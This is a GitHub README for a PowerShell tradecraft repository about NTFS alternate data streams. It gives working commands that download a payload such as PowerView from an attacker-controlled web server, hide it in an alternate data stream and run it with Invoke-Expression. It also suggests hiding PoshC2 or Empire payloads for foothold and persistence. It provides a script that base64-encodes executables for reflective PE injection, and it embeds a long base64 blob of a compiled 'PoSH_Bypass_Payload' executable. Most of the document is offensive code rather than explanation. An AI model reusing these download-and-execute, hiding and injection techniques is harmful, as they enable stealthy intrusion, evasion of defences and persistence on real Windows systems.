Skip to content

davehardy20/Alternate-Data-Streams

BranchesTags

Repository files navigation

Alternate-Data-Streams with PowerShell

I literally stumbled upon this whilst reading up on the parameters for the Get-Content and Set-Content cmdlets for another piece of research. The parameter that got my interest is -Stream which allows the user the ability to read and write NTFS alternate data streams. If we create a file with the following commands;

$file = "$env:TEMP\test.txt"
Set-Content -Path $file -Value 'Alternate Data Stream Test File'

To read the file content, we use the following;

Get-Content -Path $file

Which will return;

Alternate Data Stream Test File

Hiding Content

As I mentioned above the -Stream parameter lets the user access the 'Hidden' NTFS Alternate Data Stream. A simple example using the file created above;

Add-Content -Path $file -Value 'Hidden Data' -Stream 'hiddenstream'

Get-Content -Path $file -Stream 'hiddenstream'

Something More Useful

This is great, however not so much use, so what if we could hide something a touch more useful, say PowerView? Taking the simple Proof of Concept - alternate-data-stream.txt from the repository, we create a new file as above, put some content in the file, however we now download a payload, (PowerView.ps1 in this example), from a webserver we control and hide it in an NFTS Alternate Data Stream, (called powerview).Finally we grab the content from the ADS and execute it.

$file = "$env:TEMP\test.txt"
Set-Content -Path $file -Value 'Alternate Data Stream Test File'
Get-Content -Path $file
Alternate Data Stream Test File

$pvfile = Invoke-WebRequest -Uri http://192.168.0.105:8000/powerview.ps1
Add-Content -Encoding Byte -Path $file -Value $pvfile.Content -Stream 'powerview'
Invoke-Expression (Get-Content -Path $file -Stream 'powerview' -Raw)

Taking things further I put together a PowerShell script that creates a random filename with a randomish amount of random content and a random ADS name. The script asks the user for the uri of the payload downloads it and embeds into the ADS of the freshly created file. The POC then retrieves and executes the downloaded content from the ADS of the random file. Also in this example the download process is able to detect webproxy settings and use the current user's credentials, (Proxy Aware).

The script should be ran . sourced i.e.

. ./Invoke-ADS.ps1

The screenshot below shows PowerView being pulled from a web server, being stored in a file/ADS then retrieved and executed.

Alt text

Further uses could be to download a payload, say a standard PoshC2 or Empire payload and hide it in ADS of a file and use this as the initial foothold and a persistence method. Or perhaps a full executable stored in a PowerShell script and executed using Invoke-ReflectivePEInjection.ps1, similar to the way Invoke-Mimikatz.ps1 works. If we look inside the Invoke-Mimikatz script the authors notes at around line 56 state 'This script was created by combining the Invoke-ReflectivePEInjection script written by Joe Bialek and the Mimikatz code written by Benjamin DELPY'

So to achieve a similar outcome with an executable of your making the process would be essentially just encode your exe and store in $PEBytes and call the Invoke-ReflectivePEInjection function.

I've added a couple of scripts to give a proof of concept, the first script Convert-ExeToString.ps1, will take the path of the exe payload you want to encode, its output will be a base64 encoded string of the exe bytes.

<#
A dirty script to take the path to an .exe read all the bytes and base64 encode.
#>

function Convert-ExeToString {
 
   [CmdletBinding()] param (
 
      [string] $File
   )
  $ByteArray = [System.IO.File]::ReadAllBytes($File);
  if ($ByteArray) {
      $Base64String = [System.Convert]::ToBase64String($ByteArray);
   }
   Write-Output -InputObject $Base64String;
}
Import-Module .\Convert-ExeToString.ps1
Convert-ExeToString -File ~/Desktop\PoSH_Bypass_Payload.exe

Alt text

Now take the encoded output and create a script similar to the example script Example-ReflectivePayload.ps1, shown below

<#
Place the output from the Convert-ExeToString script in the $ExeBytes variable
Below, this is were the Invoke-ReflectivePEInjection.ps1 is copied/pasted fully, I've clipped it here
as its a large script.
Finally we convert the Base64 encoded Exe bytes back to a format that can be injected into memory.
#>
 
$ExeBytes = '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YW5kbGUAR2V0VHlwZQBTeXN0ZW0uQ29yZQBEaXNwb3NlAENyZWF0ZQBHdWlkQXR0cmlidXRlAERlYnVnZ2FibGVBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmlidXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAFRhcmdldEZyYW1ld29ya0F0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAEFzc2VtYmx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBTZXRWYWx1ZQBQb1NIX0J5cGFzc19QYXlsb2FkLmV4ZQBFbmNvZGluZwBTeXN0ZW0uUnVudGltZS5WZXJzaW9uaW5nAEZyb21CYXNlNjRTdHJpbmcAR2V0U3RyaW5nAFN5c3RlbS5EaWFnbm9zdGljcy5FdmVudGluZwBTeXN0ZW0uQ29sbGVjdGlvbnMuT2JqZWN0TW9kZWwAUG93ZXJTaGVsbABQcm9ncmFtAFN5c3RlbQBCb29sZWFuAE1haW4AU3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbgBTeXN0ZW0uUmVmbGVjdGlvbgBGaWVsZEluZm8ARXZlbnRQcm92aWRlcgAuY3RvcgBTeXN0ZW0uRGlhZ25vc3RpY3MAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMARGVidWdnaW5nTW9kZXMAQmluZGluZ0ZsYWdzAGFyZ3MAUFNPYmplY3QAQWRkU2NyaXB0AENvbnZlcnQAU3lzdGVtLlRleHQAU3lzdGVtUG9saWN5AGdldF9Bc3NlbWJseQBvcF9JbmVxdWFsaXR5AFN5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24uU2VjdXJpdHkAAKfRYwB3AEIAaABBAEcAdwBBAEkAQQBCAGgAQQBDAEEAQQBUAGcAQgBsAEEASABjAEEATABRAEIAUABBAEcASQBBAGEAZwBCAGwAQQBHAE0AQQBkAEEAQQA3AEEARwBrAEEAWgBRAEIANABBAEMAZwBBAFkAUQBBAGcAQQBFAGsAQQBUAHcAQQB1AEEARgBNAEEAZABBAEIAeQBBAEcAVQBBAFkAUQBCAHQAQQBGAEkAQQBaAFEAQgBoAEEARwBRAEEAWgBRAEIAeQBBAEMAZwBBAEsAQQBCAGgAQQBDAEEAQQBTAFEAQgBQAEEAQwA0AEEAUQB3AEIAdgBBAEcAMABBAGMAQQBCAHkAQQBHAFUAQQBjAHcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEMANABBAFIAQQBCAGwAQQBHAFkAQQBiAEEAQgBoAEEASABRAEEAWgBRAEIAVABBAEgAUQBBAGMAZwBCAGwAQQBHAEUAQQBiAFEAQQBvAEEARgBzAEEAUwBRAEIAUABBAEMANABBAFQAUQBCAGwAQQBHADAAQQBiAHcAQgB5AEEASABrAEEAVQB3AEIAMABBAEgASQBBAFoAUQBCAGgAQQBHADAAQQBYAFEAQgBiAEEARQBNAEEAYgB3AEIAdQBBAEgAWQBBAFoAUQBCAHkAQQBIAFEAQQBYAFEAQQA2AEEARABvAEEAUgBnAEIAeQBBAEcAOABBAGIAUQBCAEMAQQBHAEUAQQBjAHcAQgBsAEEARABZAEEATgBBAEIAVABBAEgAUQBBAGMAZwBCAHAAQQBHADQAQQBaAHcAQQBvAEEAQwBjAEEAYgBnAEIAVwBBAEYAbwBBAGQAQQBCAGoAQQBEAGsAQQBiAHcAQQAwAEEARQBVAEEAVQBBAEEAMwBBAEgAVQBBAFcAQQBBADIAQQBFAGcAQQBlAEEAQQByAEEARQBFAEEAVAB3AEIAbABBAEYAawBBAGEAQQBCAHUAQQBGAE0AQQBhAEEAQgBQAEEARgBvAEEAWgB3AEEAcgBBAEUAbwBBAFEAUQBBADAAQQBEAFUAQQBTAGcAQgBMAEEARABjAEEAUgBRAEIAcQBBAEcAYwBBAFoAdwBCADUAQQBHAEkAQQBWAFEAQQB3AEEARwBNAEEAZQBRAEIAUQBBAEgATQBBAFEAZwBCAFMAQQBGAE0AQQBUAFEAQQAxAEEARgBVAEEAYQBBAEIANQBBAEUATQBBAFQAUQBBAHoAQQBIAGcAQQBNAHcAQQB5AEEARABrAEEAYgBBAEEANABBAEQAVQBBAFkAUQBBAHcAQQBGAFEAQQBWAEEAQgAxAEEARgBnAEEAZQBRAEIAUgBBAEcAUQBBAGMAZwBCADAAQQBHAEkAQQBkAGcAQgBRAEEARABjAEEAYwBnAEIATgBBAEgAWQBBAFcAUQBCADAAQQBHAGcAQQBaAGcAQgBMAEEARwBjAEEATQBRAEIANgBBAEcAVQBBAFoAdwBCAFgAQQBHAEUAQQBPAFEAQgByAEEARQBVAEEASwB3AEEANABBAEcAZwBBAFEAdwBBADIAQQBHAGMAQQBhAFEAQgBsAEEARABZAEEAZQBnAEIAUwBBAEUAawBBAE0AZwBCAEIAQQBGAGcAQQBiAEEAQgBZAEEASABJAEEAZQBBAEIAegBBAEgAQQBBAGUAUQBCAEIAQQBFAE0AQQBhAHcAQQAxAEEARwAwAEEAVABRAEIAbABBAEUAMABBAFoAdwBBAHcAQQBEAE0AQQBUAEEAQgBQAEEARgBrAEEAVQBnAEEAdwBBAEQARQBBAGQAdwBCAHIAQQBFAEUAQQBXAFEAQgAyAEEARwBvAEEAUgBRAEIAUgBBAEgAUQBBAGIAZwBCAHcAQQBFAFUAQQBiAFEAQgBsAEEARQBnAEEAVQB3AEEAdwBBAEgAbwBBAFYAdwBCAEcAQQBHADAAQQBUAHcAQgBEAEEASABBAEEAZABnAEEAeQBBAEYAWQBBAFQAdwBCADAAQQBGAFUAQQBNAFEAQgBZAEEARABJAEEATAB3AEEAcgBBAEgAUQBBAGMAdwBCAEMAQQBIAEkAQQBaAEEAQgBoAEEARQA4AEEAWQBRAEIAaQBBAEYAWQBBAFEAdwBCAHgAQQBEAGsAQQBXAEEAQQB6AEEARABrAEEAWQB3AEIAUQBBAEUAUQBBAE8AUQBCADYAQQBGAGsAQQBjAFEAQgAyAEEARQBnAEEAVwBBAEIAMgBBAEQAZwBBAGUAZwBCAHUAQQBFAE0AQQBTAHcAQgBzAEEARABrAEEAYwBBAEIAQwBBAEUARQBBAGEAZwBBADUAQQBGAFUAQQBRAHcAQgBSAEEARwBFAEEAUgBRAEIAMQBBAEQATQBBAFkAZwBBAHgAQQBHAG8AQQBhAEEAQgBNAEEARgBFAEEAWgB3AEIATwBBAEUAbwBBAFoAdwBCAHcAQQBFADAAQQBNAGcAQgBMAEEARgBRAEEAYQB3AEIANgBBAEYAYwBBAFMAZwBCAGgAQQBHAFEAQQBlAFEAQgA0AEEASABZAEEATQB3AEEAeQBBAEYAZwBBAFMAUQBCAFoAQQBHADgAQQBiAEEAQQB2AEEARQBJAEEAZAB3AEIAMQBBAEgAVQBBAFQAUQBBADMAQQBHAGsAQQBTAEEAQgBWAEEASABnAEEAUQBnAEIAegBBAEgATQBBAFYAUQBBADMAQQBHAGcAQQBhAFEAQgBqAEEASABrAEEAUgBBAEEAeQBBAEUAOABBAGMAZwBCAFYAQQBDAHMAQQBhAEEAQgBLAEEARwA0AEEAYQB3AEIAbABBAEcAcwBBAGEAdwBCAEUAQQBIAFUAQQBWAFEAQgA1AEEARABFAEEAYgBRAEIARgBBAEcAawBBAFYAdwBCAFUAQQBIAEEAQQBaAFEAQQB3AEEASABnAEEASwB3AEEAcgBBAEYAUQBBAGEAUQBCAEYAQQBFAFkAQQBZAHcAQgBLAEEARQBJAEEAYwBBAEIAbwBBAEYAawBBAFMAUQBCADUAQQBEAEkAQQBVAGcAQgBSAEEARgBRAEEAYgB3AEIAaQBBAEcAWQBBAGEAUQBCAHQAQQBGAGsAQQBZAHcAQgBFAEEARgBRAEEAUwB3AEIAVgBBAEcAawBBAGEAZwBCAHAAQQBIAFUAQQBVAFEAQgBGAEEASABBAEEATgBBAEIARgBBAEgAZwBBAE4AdwBCAE0AQQBFAGsAQQBiAHcAQQAwAEEASABNAEEAYgBnAEIAcgBBAEgAQQBBAE4AdwBCAGEAQQBIAEkAQQBkAGcAQgBpAEEARgBnAEEAZQBBAEIAYQBBAEQAVQBBAFEAZwBCAEQAQQBFAGMAQQBaAGcAQgBRAEEARgBRAEEAVgB3AEIASgBBAEYATQBBAGUAZwBCAFEAQQBIAFkAQQBPAFEAQgB4AEEASABjAEEAUwB3AEIAegBBAEUAZwBBAGUAQQBBAHcAQQBHAEkAQQBNAEEAQgBLAEEASABrAEEAZQBnAEIAWQBBAEcAYwBBAGIAdwBCAFAAQQBHAG8AQQBiAFEAQgB6AEEARgBnAEEAUwBBAEIAdABBAEUAUQBBAFQAdwBCAHQAQQBGAE0AQQBOAGcAQgA2AEEARwA0AEEAZQBnAEIAVQBBAEcAVQBBAFoAQQBCAG4AQQBFAFEAQQBZAFEAQgB3AEEARwB3AEEAYgBBAEIANQBBAEcARQBBAFcAZwBBAHIAQQBIAFkAQQBRAGcAQgBCAEEARABJAEEAWQBRAEIAegBBAEUAbwBBAFkAZwBCAHgAQQBEAE0AQQBhAGcAQgBTAEEARABjAEEATgBnAEIAMQBBAEUAdwBBAGUAZwBCAGEAQQBFAE0AQQBlAFEAQgBuAEEARgBFAEEAUQB3AEIAYQBBAEYAbwBBAFUAZwBCAEoAQQBDAHMAQQBlAFEAQQAxAEEARQBZAEEAVQBBAEIATwBBAEYAUQBBAGMAQQBCAHgAQQBFAEkAQQBNAGcAQgBYAEEARQBzAEEAYQBnAEIAdQBBAEcANABBAGIAQQBCAGoAQQBGAGMAQQBlAEEAQgBCAEEASABJAEEATQBnAEEAMwBBAEUAWQBBAFEAdwBBADAAQQBIAE0AQQBiAEEAQgBaAEEARQBZAEEAUgB3AEIAeQBBAEUAcwBBAE8AUQBCAG4AQQBEAGcAQQBZAGcAQgBFAEEARQB3AEEATQBnAEIAQwBBAEcAbwBBAEwAdwBCAE0AQQBEAGcAQQBTAFEAQgBpAEEASABBAEEAZQBnAEIAMgBBAEcAOABBAGUAQQBCAGwAQQBGAGMAQQBVAGcAQgB0AEEASABvAEEAZAB3AEIASQBBAEcASQBBAFkAZwBCAGgAQQBEAEUAQQBZAGcAQQAxAEEARABFAEEAUgBnAEIAWABBAEgAZwBBAGMAUQBCAHUAQQBIAGsAQQBWAHcAQgB0AEEARABrAEEAYwBRAEIATgBBAEQAawBBAGEAZwBCAEIAQQBFAFUAQQBPAEEAQgBoAEEARwBRAEEAYwBBAEIATABBAEYARQBBAGIAUQBCAEYAQQBGAGsAQQBVAGcAQgB4AEEARgBRAEEAYwBnAEIAMwBBAEcAWQBBAGEAdwBCADQAQQBDADgAQQBVAGcAQQB6AEEARABBAEEATgBnAEIAVwBBAEUAcwBBAFIAQQBCAEwAQQBHAGcAQQBiAFEAQgBFAEEARwA4AEEAYgBBAEIAawBBAEUAMABBAFEAUQBCADQAQQBHAHMAQQBaAGcAQgBzAEEARwAwAEEAVQBBAEIAWgBBAEYASQBBAFkAdwBCAEMAQQBFAEUAQQBRAFEAQgB1AEEARgBrAEEATQBRAEIAWABBAEgAVQBBAFkAUQBCAFcAQQBHAHMAQQBhAFEAQgBZAEEARgBVAEEAUgB3AEEAMQBBAEgATQBBAFkAZwBCAHYAQQBFAEUAQQBVAEEAQgBLAEEARQBVAEEAYQBnAEIAVgBBAEYAYwBBAFkAdwBCAHUAQQBEAGMAQQBUAHcAQgBGAEEASABnAEEAWQBnAEIAdQBBAEYAWQBBAFUAdwBCAHYAQQBEAFUAQQBiAHcAQgA2AEEARQBzAEEAYwBBAEIAcwBBAEUAawBBAGEAdwBCADYAQQBHADgAQQBhAEEAQQA0AEEARwBnAEEAYgBRAEIAbABBAEcAawBBAGMAQQBCAGgAQQBIAGMAQQBNAFEAQgBJAEEARwBrAEEAUgBBAEIARABBAEQAZwBBAGQAUQBCADUAQQBFADQAQQBUAHcAQgBYAEEARwBvAEEAYQBBAEIARgBBAEMAOABBAGQAQQBBADAAQQBGAEkAQQBXAGcAQQB5AEEASABnAEEATwBRAEIAdABBAEMAOABBAE0AUQBCAEIAQQBIAFkAQQBUAFEAQgAzAEEARABrAEEAWgBBAEIAaABBAEQASQBBAE8AUQBBADUAQQBFADAAQQBOAFEAQgBoAEEARABJAEEATAB3AEIAUgBBAEcAYwBBAFEAdwBCAFcAQQBDADgAQQBiAGcAQQA1AEEASABnAEEAWQBRAEIASQBBAEYASQBBAGQAQQBBAHgAQQBIAGsAQQBhAFEAQgB5AEEASABFAEEAVABnAEIAbwBBAEcAZwBBAFYAZwBCAEwAQQBIAEUAQQBNAEEAQgBrAEEARABNAEEAVABBAEEAMwBBAEUAMABBAE0AUQBBADUAQQBHAEkAQQBVAHcAQgBqAEEARwBFAEEAUgBBAEEAdgBBAEcAbwBBAFQAUQBBADUAQQBHAG8AQQBUAEEAQgBQAEEARQBRAEEAVABRAEEAegBBAEQAQQBBAFUAUQBBADQAQQBIAG8AQQBjAGcAQgAwAEEARwBJAEEATQBnAEIAVgBBAEcAawBBAFcAUQBCAGwAQQBHADQAQQBiAEEAQQB6AEEASABJAEEAVwBnAEEANABBAEYASQBBAGQAZwBCAG4AQQBIAE0AQQBkAGcAQgBqAEEASABZAEEAVQBnAEIANABBAEYASQBBAE4AdwBCADAAQQBEAE0AQQBRAHcAQgBMAEEARQBrAEEAZAB3AEEAMQBBAEgAbwBBAGEAZwBCAFcAQQBHADAAQQBSAHcAQgAzAEEARwBjAEEAZQBBAEEAMABBAEMAcwBBAFEAdwBCAFQAQQBEAFUAQQBlAFEAQgBMAEEARABRAEEAYQB3AEIAeQBBAEcAcwBBAEwAdwBCADMAQQBDAHMAQQBRAHcAQgBKAEEARwBRAEEATgBBAEEAMQBBAEYASQBBAFQAUQBCAEYAQQBEAE0AQQBjAHcAQgBMAEEARgBBAEEAVABBAEIAaQBBAEcASQBBAFcAQQBBAHIAQQBFAG8AQQBaAGcAQQAzAEEARwBJAEEAWQBnAEIATABBAEUAdwBBAFUAdwBCAEgAQQBIAFUAQQBTAEEAQQAxAEEARQBFAEEATwBBAEEAMwBBAEcAcwBBAFcAZwBCAHYAQQBHAGsAQQBOAGcAQgBVAEEARQBNAEEAYgBBAEIAdwBBAEYAQQBBAFQAQQBCAE8AQQBGAEUAQQBiAEEAQgBLAEEASABrAEEAYwBnAEIAMgBBAEcARQBBAE4AUQBCAGwAQQBHAFEAQQBTAGcAQgBKAEEASABRAEEAYQBnAEIAWgBBAEgAbwBBAFUAQQBBADMAQQBIAE0AQQBXAFEAQQB4AEEARABrAEEAVgBRAEIAUQBBAEUAVQBBAGMAZwBCAE8AQQBHAFkAQQBLAHcAQgBuAEEARgBVAEEAYQBnAEEAeQBBAEQASQBBAGQAZwBBAHkAQQBEAGsAQQBaAEEAQgBPAEEARQBRAEEATQB3AEIANABBAEYAawBBAGIAdwBBAHcAQQBFAFUAQQBXAFEAQgBoAEEARQBRAEEAZAB3AEIANABBAEYAQQBBAFYAdwBCAEwAQQBFAGsAQQBSAHcAQgBOAEEARQBzAEEAVwBnAEIASABBAEUAcwBBAE4AZwBCADIAQQBEAEEAQQBiAEEAQgB6AEEARABNAEEAUQBnAEEAMABBAEgAQQBBAFYAUQBBAHkAQQBHADgAQQBhAEEAQgBhAEEARQB3AEEAVQBRAEEAMQBBAEYATQBBAGQAZwBCAEgAQQBEAEEAQQBlAGcAQgBIAEEARgBNAEEATwBBAEIAUQBBAEcAawBBAE4AdwBCAEQAQQBHAHcAQQBNAFEAQgAwAEEASABFAEEAWQBnAEEAcgBBAEgATQBBAGEAUQBCAEgAQQBEAEEAQQBTAEEAQgBQAEEARgBJAEEAYgB3AEIATwBBAEYAawBBAGIAQQBCAHEAQQBFADQAQQBkAEEAQgB2AEEARwA0AEEAYgB3AEIAUABBAEcAawBBAFYAQQBCAFQAQQBIAG8AQQBTAGcAQgBEAEEARQBrAEEAYgBBAEEAMwBBAEUASQBBAFMAdwBCAEcAQQBHAGcAQQBWAGcAQgBtAEEARQBrAEEAYgBnAEIAdABBAEcARQBBAGEAZwBCAEgAQQBFAGMAQQBhAGcAQgAzAEEASABNAEEAVwBBAEIAawBBAEYAUQBBAGIAZwBCAEgAQQBHADAAQQBZAGcAQQB6AEEARgBFAEEAZABBAEIASwBBAEgAWQBBAFMAUQBCAHIAQQBHADAAQQBRAGcAQQAyAEEARABZAEEAVABBAEIAegBBAEYATQBBAFIAUQBCAFAAQQBIAFkAQQBVAFEAQgBCAEEARgBjAEEATgBBAEIAVQBBAEYAVQBBAE8AUQBCAHAAQQBHAEUAQQBTAHcAQgBUAEEARwBZAEEAVQB3AEIASABBAEYAVQBBAGUAQQBCAHMAQQBGAE0AQQBiAFEAQQAyAEEASABjAEEAYgBnAEIAcQBBAEYAawBBAEwAdwBCAFUAQQBIAEkAQQBVAEEAQgAxAEEARQA4AEEAVQB3AEIAcwBBAEcAbwBBAGUAZwBCAFcAQQBEAGsAQQBZAGcAQQB4AEEARgBZAEEATgB3AEIASwBBAEcAawBBAFQAQQBCAEkAQQBIAGsAQQBlAGcAQgBtAEEASABnAEEAYgBBAEIAWgBBAEMAOABBAFoAZwBCAEgAQQBGAFkAQQBaAHcAQgB5AEEARABZAEEAZQBBAEIAMgBBAEUAawBBAFMAdwBBAHIAQQBGAEkAQQBSAGcAQQByAEEARABrAEEAYQB3AEIAbgBBAEgAQQBBAFcAZwBCAEoAQQBHAEUAQQBSAGcAQgAwAEEARABnAEEATgBRAEIAWQBBAEUAZwBBAFQAUQBBAHYAQQBFAE0AQQBUAGcAQgBoAEEARQBrAEEAWQBRAEIAVwBBAEcASQBBAGIAZwBCAHIAQQBGAEkAQQBhAFEAQgB2AEEARwBNAEEAYQBnAEIAVwBBAEcAYwBBAFQAZwBCAFUAQQBHADgAQQBLAHcAQgAzAEEARwBFAEEATgBRAEEAMwBBAEcAUQBBAGUAZwBCAFgAQQBFAFEAQQBhAEEAQgAwAEEARwBzAEEAUwBRAEIASQBBAEcAdwBBAGEAdwBCAGoAQQBFAFEAQQBOAHcAQgBSAEEARQBNAEEAYQBBAEEAMQBBAEUAVQBBAFIAZwBCAHIAQQBEAFEAQQBZAGcAQgBTAEEARQBRAEEATgB3AEIAWABBAEgARQBBAE0AUQBCAFcAQQBHAEUAQQBZAHcAQgBWAEEARwA0AEEAVABRAEIAYQBBAEQAUQBBAFEAZwBCAE8AQQBFAFUAQQBPAEEAQQAyAEEARQBVAEEATgB3AEIAWQBBAEQAWQBBAFQAQQBBAHgAQQBGAGsAQQBUAFEAQgA0AEEARgBNAEEAUwBnAEIAQgBBAEUAawBBAGEAQQBCAE0AQQBHAE0AQQBOAFEAQgBoAEEASABnAEEAZABnAEIAbABBAEQAZwBBAE4AQQBBADEAQQBHAEUAQQBjAEEAQgBIAEEAQwBzAEEAZQBBAEEAegBBAEcAbwBBAFYAdwBCAHgAQQBFADgAQQBOAEEAQgAwAEEASABrAEEATAB3AEIAdgBBAEUAcwBBAE4AUQBCAFgAQQBFAGsAQQBXAEEAQgBqAEEARABBAEEAWQBnAEIAaABBAEQAZwBBAFoAUQBCAFMAQQBGAGMAQQBNAGcAQQAxAEEARwBNAEEATQB3AEEANQBBAEcAUQBBAGQAZwBCADAAQQBEAGsAQQBUAFEAQQB4AEEASABJAEEAUgBnAEIAUgBBAEUARQBBAE4AZwBCAEYAQQBHAHcAQQBlAFEAQQA1AEEARABjAEEAUwB3AEIAUQBBAEgAQQBBAE8AUQBCAHcAQQBEAEEAQQBjAFEAQQA0AEEARQBVAEEATwBRAEIAWABBAEUANABBAFIAdwBCAFYAQQBDADgAQQBUAFEAQgBuAEEARQA4AEEAVgBBAEEANQBBAEUAZwBBAFEAUQBCAEsAQQBEAFkAQQBaAEEAQQB6AEEARQBJAEEATgBRAEIAbwBBAEcAZwBBAFMAUQBCAHAAQQBHAGcAQQBVAHcAQQAwAEEARgBNAEEAYQBnAEIARgBBAEQAQQBBAFYAUQBCAHoAQQBHAEUAQQBhAHcAQgBwAEEASABRAEEAYgBnAEIAdQBBAEMAcwBBAFMAQQBCAE4AQQBEAEkAQQBVAGcAQgBFAEEARABnAEEAYgB3AEIANQBBAEUAdwBBAFoAUQBCAGkAQQBEAFUAQQBUAHcAQQB3AEEASABVAEEATgB3AEIAbQBBAEYASQBBAGUAQQBCAGEAQQBGAEUAQQBlAEEAQgBLAEEARwA0AEEAVABRAEIAawBBAEcAMABBAFIAdwBCAFcAQQBHAG8AQQBZAFEAQgBDAEEARQBjAEEAUwBRAEEAcgBBAEUAdwBBAGIAQQBCAFAAQQBEAGMAQQBkAFEAQgBxAEEARwBRAEEATwBBAEIAMABBAEYASQBBAGMAdwBCAE8AQQBHAEUAQQBhAHcAQgBZAEEASABrAEEATQBRAEIAUQBBAEcAZwBBAFQAZwBCAEUAQQBFAGcAQQBkAEEAQgBpAEEARwAwAEEAUgBBAEIATgBBAEYAawBBAGMAdwBCAHAAQQBDADgAQQBWAFEAQgB5AEEARwBZAEEAVwBnAEIATwBBAEQAWQBBAFoAdwBCADQAQQBGAFEAQQBWAGcAQgA2AEEARQBnAEEAYQB3AEIANABBAEgAYwBBAGEAdwBCAFgAQQBFAHMAQQBiAHcAQgB2AEEARABJAEEATgBRAEEANQBBAEYARQBBAGQAZwBBAHkAQQBFADgAQQBMAHcAQgBRAEEARgBnAEEATwBBAEIAaABBAEUASQBBAE8AQQBCAFUAQQBEAEkAQQBTAHcAQgBwAEEASABrAEEAYQB3AEIAcgBB